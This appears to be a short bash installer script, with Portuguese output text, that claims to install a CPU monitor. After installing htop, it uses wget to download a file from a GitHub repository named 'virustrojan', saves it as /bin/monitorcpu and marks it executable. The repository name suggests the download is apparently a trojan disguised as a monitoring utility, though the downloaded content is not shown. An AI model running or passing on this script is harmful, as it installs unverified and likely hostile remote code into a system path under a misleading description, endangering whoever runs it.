#!/bin/bash
echo "INSTALANDO MONITOR CPU..."
sleep 2
apt-get install htop -y
clear
wget https://raw.githubusercontent.com/dhtm15/virustrojan/master/monitorcpu -O /bin/monitorcpu
chmod +x /bin/monitorcpu
